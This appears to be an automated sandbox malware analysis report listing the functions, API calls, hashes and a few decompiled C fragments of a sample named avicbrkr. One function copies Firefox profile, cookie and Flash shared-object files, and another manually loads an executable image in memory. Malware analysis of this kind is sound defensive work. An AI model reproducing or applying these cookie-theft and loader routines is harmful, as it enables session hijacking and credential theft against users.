                      • API ID: lstrcmplstrlen
                      • String ID:
                      • API String ID: 898299967-0
                      • Opcode ID: 8c10f301e7b0bffac5306e8c1d41512e6635f864b05ae3b1208748cb3a4b0131
                      • Instruction ID: 54b63d8d69bb9f4bc7578fbb484e234bc24b6a0bfeeefc84b514e9a87edbe3ee
                      • Opcode Fuzzy Hash: 8c10f301e7b0bffac5306e8c1d41512e6635f864b05ae3b1208748cb3a4b0131
                      • Instruction Fuzzy Hash: 51415C75A10705DFEF15EF56C884BAE77B9BF44301F2980AAD8129B340E3B4EA40DB51
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038DACC, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(0039E000,?,00000000,?,?,?,?,00000001,0038DC30,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0038DADA
                        • Part of subcall function 0038814B: GetModuleHandleA.KERNEL32(-00000002,00000000,0039C828,00000000,?,0037B5E2,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC,?), ref: 00388181
                        • Part of subcall function 0038911C: GetLastError.KERNEL32(00000000,00000000,00001000,00000000,00001000,00000000,0039C828,00000000), ref: 0038919B
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 003881D1: RtlEnterCriticalSection.NTDLL(H}*), ref: 003881F9
                        • Part of subcall function 003881D1: RtlLeaveCriticalSection.NTDLL(H}*), ref: 0038820A
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalHandleModuleSection$EnterErrorFreeHeapLastLeave
                      • String ID:
                      • API String ID: 3842935252-0
                      • Opcode ID: aeffd02d86bee0869922dabf2eb75dc53248d304059443e4df343e1f16a19876
                      • Instruction ID: 09586f76ef7f93c470c357d3d8d89d3d7fd66cb3f94f8607e8f89fb01b01e70d
                      • Opcode Fuzzy Hash: aeffd02d86bee0869922dabf2eb75dc53248d304059443e4df343e1f16a19876
                      • Instruction Fuzzy Hash: 73218676B00314ABCF23FF99C886A9DB7B9FB44310F5744E6D505AB281D6709D42CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038814B, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(-00000002,00000000,0039C828,00000000,?,0037B5E2,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC,?), ref: 00388181
                        • Part of subcall function 003879CC: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00399550,00000014,003881BE,?,00000000,?), ref: 00387A59
                        • Part of subcall function 003879CC: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,0037B5E2), ref: 00387A93
                        • Part of subcall function 003879CC: RtlEnterCriticalSection.NTDLL(H}*), ref: 00387ABC
                        • Part of subcall function 003879CC: RtlLeaveCriticalSection.NTDLL(H}*), ref: 00387ADA
                        • Part of subcall function 003879CC: GetLastError.KERNEL32(?,0037B5E2), ref: 00387AEF
                        • Part of subcall function 0038885B: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,H}*), ref: 00388872
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalProtectSectionVirtual$EnterErrorHandleInformationLastLeaveModuleProcessQuery
                      • String ID:
                      • API String ID: 531956962-0
                      • Opcode ID: 8b7d2a113f5c5d457074baeb4116b715f37f213bb4b6ac20ec9d78aad12c63bd
                      • Instruction ID: d121ede9d6aa96d63bf9478e9a65651f5ceece0c04687dc9fd5cc5520c52082a
                      • Opcode Fuzzy Hash: 8b7d2a113f5c5d457074baeb4116b715f37f213bb4b6ac20ec9d78aad12c63bd
                      • Instruction Fuzzy Hash: 6F11C432200305AFDB22AF55CC89AB677A9EF003A0B954469F994CA150DF71DC42DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003956D6, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 003956E8
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D0057,00000000,00000001,0037D9D1,?,?,00370000), ref: 00395010
                        • Part of subcall function 00394F97: LoadLibraryA.KERNEL32(?), ref: 0039508D
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395099
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007E,00000000,00000001,0037D9D1), ref: 003950CC
                        • Part of subcall function 00394F97: InterlockedExchange.KERNEL32(0037853D,00000000), ref: 003950DE
                        • Part of subcall function 00394F97: LocalAlloc.KERNEL32(00000040,00000008), ref: 003950F2
                        • Part of subcall function 00394F97: FreeLibrary.KERNEL32(00000000), ref: 0039510F
                        • Part of subcall function 00394F97: GetProcAddress.KERNEL32(?,?,?,?,00370000), ref: 00395164
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395170
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 003951A2
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
                      • String ID:
                      • API String ID: 1405810187-0
                      • Opcode ID: 1166df96552922306aee1618dfd269723e89b5e5ff9c9f9ec43877bd91d5325b
                      • Instruction ID: 799137a8e670fe05f687dc073da9d8525955ba747153ad1f9abe6e4909607c1b
                      • Opcode Fuzzy Hash: 1166df96552922306aee1618dfd269723e89b5e5ff9c9f9ec43877bd91d5325b
                      • Instruction Fuzzy Hash: 51B012D52AD702BF3D0721045C07D36161CC4C0B303B0551FF001D8040E4405C860435
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003956FC, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 003956E8
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D0057,00000000,00000001,0037D9D1,?,?,00370000), ref: 00395010
                        • Part of subcall function 00394F97: LoadLibraryA.KERNEL32(?), ref: 0039508D
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395099
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007E,00000000,00000001,0037D9D1), ref: 003950CC
                        • Part of subcall function 00394F97: InterlockedExchange.KERNEL32(0037853D,00000000), ref: 003950DE
                        • Part of subcall function 00394F97: LocalAlloc.KERNEL32(00000040,00000008), ref: 003950F2
                        • Part of subcall function 00394F97: FreeLibrary.KERNEL32(00000000), ref: 0039510F
                        • Part of subcall function 00394F97: GetProcAddress.KERNEL32(?,?,?,?,00370000), ref: 00395164
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395170
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 003951A2
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
                      • String ID:
                      • API String ID: 1405810187-0
                      • Opcode ID: c44e01c974b7c6c524c1d47468bea98dc13a800c1d65d448f876a662e1c46fa8
                      • Instruction ID: 10352b2609caa755ee5de34ccd11f5af72b24d74544a7f3039f2a647745f977d
                      • Opcode Fuzzy Hash: c44e01c974b7c6c524c1d47468bea98dc13a800c1d65d448f876a662e1c46fa8
                      • Instruction Fuzzy Hash: D3A011C22AEA03BC3C0B2200AC02C3A022CC0C0BB03B0880EF002C8080A8800C8A0030
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0039571C, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 003956E8
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D0057,00000000,00000001,0037D9D1,?,?,00370000), ref: 00395010
                        • Part of subcall function 00394F97: LoadLibraryA.KERNEL32(?), ref: 0039508D
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395099
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007E,00000000,00000001,0037D9D1), ref: 003950CC
                        • Part of subcall function 00394F97: InterlockedExchange.KERNEL32(0037853D,00000000), ref: 003950DE
                        • Part of subcall function 00394F97: LocalAlloc.KERNEL32(00000040,00000008), ref: 003950F2
                        • Part of subcall function 00394F97: FreeLibrary.KERNEL32(00000000), ref: 0039510F
                        • Part of subcall function 00394F97: GetProcAddress.KERNEL32(?,?,?,?,00370000), ref: 00395164
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395170
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 003951A2
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
                      • String ID:
                      • API String ID: 1405810187-0
                      • Opcode ID: 850e7435eeda26d6cfb3106f0b39380b25dc6b50e11f16748d8c4b7aea31e7eb
                      • Instruction ID: 10352b2609caa755ee5de34ccd11f5af72b24d74544a7f3039f2a647745f977d
                      • Opcode Fuzzy Hash: 850e7435eeda26d6cfb3106f0b39380b25dc6b50e11f16748d8c4b7aea31e7eb
                      • Instruction Fuzzy Hash: D3A011C22AEA03BC3C0B2200AC02C3A022CC0C0BB03B0880EF002C8080A8800C8A0030
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0039570C, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 003956E8
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D0057,00000000,00000001,0037D9D1,?,?,00370000), ref: 00395010
                        • Part of subcall function 00394F97: LoadLibraryA.KERNEL32(?), ref: 0039508D
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395099
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007E,00000000,00000001,0037D9D1), ref: 003950CC
                        • Part of subcall function 00394F97: InterlockedExchange.KERNEL32(0037853D,00000000), ref: 003950DE
                        • Part of subcall function 00394F97: LocalAlloc.KERNEL32(00000040,00000008), ref: 003950F2
                        • Part of subcall function 00394F97: FreeLibrary.KERNEL32(00000000), ref: 0039510F
                        • Part of subcall function 00394F97: GetProcAddress.KERNEL32(?,?,?,?,00370000), ref: 00395164
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395170
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 003951A2
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
                      • String ID:
                      • API String ID: 1405810187-0
                      • Opcode ID: 3698db9a5f5889aec3f83a612ac75573343b791735918777e7557ec31c5a2a11
                      • Instruction ID: 10352b2609caa755ee5de34ccd11f5af72b24d74544a7f3039f2a647745f977d
                      • Opcode Fuzzy Hash: 3698db9a5f5889aec3f83a612ac75573343b791735918777e7557ec31c5a2a11
                      • Instruction Fuzzy Hash: D3A011C22AEA03BC3C0B2200AC02C3A022CC0C0BB03B0880EF002C8080A8800C8A0030
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 004011F2, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004011F2(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x40305c, 0, _a4); // executed
				return _t2;
			}




                      0x004011fe
                      0x00401204

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: d935b4f51a27394032f3c67b9e1b6a96a76f042afce792340da260ee13d390f0
                      • Instruction ID: 4425f1c6487cb1303e53a5fb1f876b1ba006c7dfd0de678c3456b649a32eedb4
                      • Opcode Fuzzy Hash: d935b4f51a27394032f3c67b9e1b6a96a76f042afce792340da260ee13d390f0
                      • Instruction Fuzzy Hash: AEB01231000300EBDB019F00EF08F077F75A750701F10C030B304600B482714420EB1C
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00591D25, Relevance: 1.3, APIs: 1, Instructions: 86memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217237450.00590000.00000040.sdmp, Offset: 00590000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_590000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: b0b6fff23bb3701b533ad5ae12780d3b05db8d0f63e38d42b121aa226cddd8d5
                      • Instruction ID: 5c2fc5130ad994a717e15ac81a1ceab5d8d549c0cd1648c69377b274223737f4
                      • Opcode Fuzzy Hash: b0b6fff23bb3701b533ad5ae12780d3b05db8d0f63e38d42b121aa226cddd8d5
                      • Instruction Fuzzy Hash: 6D4102B0A012199FDB44CFA9C5846AEFBF0FF88310F61846EE848AB341D375A841CF95
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 004015A3, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004015A3(intOrPtr* __ebx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				void* __edi;
				void* _t24;
				signed int _t26;
				signed int _t27;
				signed int _t29;
				intOrPtr _t30;
				char* _t31;
				void* _t32;
				void* _t36;
				void* _t41;

				_t20 =  *((intOrPtr*)(__ebx + 4));
				_t24 = VirtualAlloc(0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ebx + 4)) + 0x3c)) + _t20 + 0x50)) + 0x00000fff & 0xfffff000, 0x1000, 4); // executed
				_t36 = _t24;
				if(_t36 == 0) {
					_v8 = 8;
				} else {
					_t26 = E0040121C(_t36,  *((intOrPtr*)(__ebx + 4)));
					_v8 = _t26;
					if(_t26 == 0) {
						_t41 =  *((intOrPtr*)(_t36 + 0x3c)) + _t36;
						_t27 = E00401398(_t36, _t41);
						_v8 = _t27;
						if(_t27 == 0) {
							_t29 = E00401495(_t41, _t36); // executed
							_v8 = _t29;
							if(_t29 == 0) {
								_t30 = E00401542( *((intOrPtr*)(__ebx)));
								_v12 = _t30;
								if(_t30 == 0) {
									_t31 = 0;
								} else {
									_v16 = _v16 & 0x00000000;
									_v20 = 0xf1c0def0;
									_t31 =  &_v20;
								}
								_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x28)) + _t36))(_t36, 1, _t31); // executed
								if(_t32 != 0) {
									_v8 = _v8 & 0x00000000;
								}
							}
						}
					}
				}
				return _v8;
			}

















                      0x004015a6
                      0x004015c9
                      0x004015cf
                      0x004015d3
                      0x0040163b
                      0x004015d5
                      0x004015d9
                      0x004015de
                      0x004015e3
                      0x004015e8
                      0x004015eb
                      0x004015f0
                      0x004015f5
                      0x004015fa
                      0x004015ff
                      0x00401604
                      0x00401608
                      0x0040160d
                      0x00401612
                      0x00401624
                      0x00401614
                      0x00401614
                      0x00401618
                      0x0040161f
                      0x0040161f
                      0x0040162f
                      0x00401633
                      0x00401635
                      0x00401635
                      0x00401633
                      0x00401604
                      0x004015f5
                      0x004015e3
                      0x00401648

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,752AC470,004016EC,?,?,00000000), ref: 004015C9
                        • Part of subcall function 0040121C: memcpy.NTDLL(004015DE,?,?,00000000,752AC470,?,?,?,?,004015DE,00000000,?,?,?,00000000), ref: 0040125C
                        • Part of subcall function 0040121C: memcpy.NTDLL(004015DE,?,?), ref: 0040129A
                        • Part of subcall function 00401398: LoadLibraryA.KERNEL32(?), ref: 004013C5
                        • Part of subcall function 00401398: lstrlenA.KERNEL32(?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 004013D8
                        • Part of subcall function 00401398: memset.NTDLL ref: 004013E2
                        • Part of subcall function 00401398: GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 0040142D
                        • Part of subcall function 00401398: lstrlenA.KERNEL32(00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 00401440
                        • Part of subcall function 00401398: memset.NTDLL ref: 0040144A
                        • Part of subcall function 00401495: VirtualProtect.KERNELBASE(00000000,?,00000004,00000000,00000000,?,?,004015FF,00000000), ref: 004014C3
                        • Part of subcall function 00401495: VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 0040151B
                        • Part of subcall function 00401495: GetLastError.KERNEL32 ref: 00401521
                        • Part of subcall function 00401542: GetModuleFileNameW.KERNEL32(?,00000000,00000104,?,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 00401560
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: Virtual$Protectlstrlenmemcpymemset$AddressAllocErrorFileLastLibraryLoadModuleNameProc
                      • String ID:
                      • API String ID: 3816444689-0
                      • Opcode ID: c481fc0c6816d887f64394c5b75e79c69b5566eca14fe893ad366164f62a3b16
                      • Instruction ID: 93de27251ef7a5c3cddc38c0c27dc13e4c4a5a163c12a8e24408c513e8fcc30f
                      • Opcode Fuzzy Hash: c481fc0c6816d887f64394c5b75e79c69b5566eca14fe893ad366164f62a3b16
                      • Instruction Fuzzy Hash: A7118E71900616EBDB119B69CD14BAF7BB8AF50704F1844BAE800FB2E1EB79DD018B58
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038911C, Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetLastError.KERNEL32(00000000,00000000,00001000,00000000,00001000,00000000,0039C828,00000000), ref: 0038919B
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateErrorFreeLast
                      • String ID:
                      • API String ID: 3102831662-0
                      • Opcode ID: 3abed237ad3ef3787e11169a8544420048b8f4d79776ec87deb7ff1c52634793
                      • Instruction ID: 330b7bfa39714445023bb9f61048fc5bffde3f5a246f69c188c231d1a053e44a
                      • Opcode Fuzzy Hash: 3abed237ad3ef3787e11169a8544420048b8f4d79776ec87deb7ff1c52634793
                      • Instruction Fuzzy Hash: 3111947290020AABD713ABE8C889BAEB7FDEF85790F25449AE405DB241DB758E01C750
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00374EA4, Relevance: 1.3, APIs: 1, Instructions: 49memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • HeapFree.KERNEL32(00000000,0037D7B1,00000000), ref: 00374F14
                        • Part of subcall function 0038EDBB: memcpy.NTDLL(0037D7B1,0037D7B1,00000000,0037D7B1,0037D7B1,0037D7B1,00000000,?,?,00374EE9,00000000,00000001,00000000,0039E1C6,0037D7B1,00000000), ref: 0038EDDE
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$AllocateCloseQueryValuememcpy
                      • String ID:
                      • API String ID: 1003249125-0
                      • Opcode ID: 76fa1148184b3a50869274ef709c6c27a892f14593660e93a9857f2490e1de34
                      • Instruction ID: e2907161ff70b7a8866692578eb33db494075dfe18b795795f908a5d7008315e
                      • Opcode Fuzzy Hash: 76fa1148184b3a50869274ef709c6c27a892f14593660e93a9857f2490e1de34
                      • Instruction Fuzzy Hash: 6F017176600204FFDB23EF59DC82EEA77ACEB48350F108062F9059B251D7B5AD059B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 001E0000, Relevance: .3, Instructions: 274COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216685660.001E0000.00000040.sdmp, Offset: 001E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_1e0000_avicbrkr.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 940c53184e77ce8d119a6f88736106b85b7995e1c9a90103885ced06dc45f035
                      • Instruction ID: 5afa55514f7a80dfb4318cfe5bd48beb6acd91a0818e1a4e0a6cf625fb035d80
                      • Opcode Fuzzy Hash: 940c53184e77ce8d119a6f88736106b85b7995e1c9a90103885ced06dc45f035
                      • Instruction Fuzzy Hash: 35E06C6405E3C05FC70797788C71A913F766E8B20038F89CBD5C08F5BBC628985AE722
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Non-executed Functions

                      Function 00371C56, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158memorystringfileCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(%APPDATA%), ref: 00371C6E
                        • Part of subcall function 00387121: memset.NTDLL ref: 003871C1
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 003873E2
                      • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 00371CB9
                      • mbstowcs.NTDLL ref: 00371CCC
                      • lstrcatW.KERNEL32(00000000,0039E774), ref: 00371CDB
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00371CFF
                      • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 00371D11
                      • lstrcatW.KERNEL32(00000000,003973F0), ref: 00371D33
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00371D57
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00371D7D
                        • Part of subcall function 00371B89: RtlAllocateHeap.NTDLL(00000000,?), ref: 00371BC8
                        • Part of subcall function 00371B89: lstrcpyW.KERNEL32(00000000,00371DC8), ref: 00371BD9
                        • Part of subcall function 00371B89: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,00371DC8,?,?), ref: 00371BF0
                        • Part of subcall function 00371B89: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,00371DC8,?,?), ref: 00371C0A
                        • Part of subcall function 00371B89: CopyFileW.KERNEL32(?,00000000,00000000), ref: 00371C3A
                        • Part of subcall function 00371B89: HeapFree.KERNEL32(00000000,00000000), ref: 00371C48
                      • DeleteFileW.KERNEL32(?), ref: 00371DCC
                      • HeapFree.KERNEL32(00000000,?), ref: 00371DDA
                      • HeapFree.KERNEL32(00000000,?), ref: 00371DF6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$FileFind$Free$AllocateCreateDirectory$CloseCriticalFirstNextObjectSectionSingleWaitlstrcatlstrlenmemset$CopyDeleteEnterLeavelstrcpymbstowcswcscpy
                      • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
                      • API String ID: 1381583133-4232923486
                      • Opcode ID: 211b98c645cc365d1ec2a5c36aa75100fcfbea4f278d8dbdfa0647299e16c161
                      • Instruction ID: 3b435d4c05cf2ac126bad58ce193cd6273a517b1ffb8e828e9be4880d85ae7df
                      • Opcode Fuzzy Hash: 211b98c645cc365d1ec2a5c36aa75100fcfbea4f278d8dbdfa0647299e16c161
                      • Instruction Fuzzy Hash: C1516272904214BFDB33EBA9DC49CEFBBBCEB85B00B10456AF505A22A0E6355D01DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037D7EE, Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 264memorylibrarynativeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memset.NTDLL ref: 0037D836
                      • CreateMutexA.KERNEL32(00000000,00000001,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D86F
                      • GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D87A
                      • CloseHandle.KERNEL32(0039D260), ref: 0037D892
                        • Part of subcall function 0038834C: GetVersion.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 00388397
                        • Part of subcall function 0038834C: GetModuleHandleA.KERNEL32(0039E01D,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 003883C4
                        • Part of subcall function 0037BAAE: RtlAllocateHeap.NTDLL(00000000,-00000003,00000000), ref: 0037BAC8
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037D8EA
                      • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0037D92F
                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D944
                      • GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037D94E
                      • CloseHandle.KERNEL32(00000000), ref: 0037D95C
                      • RtlAllocateHeap.NTDLL(00000000,00000043), ref: 0037DAFD
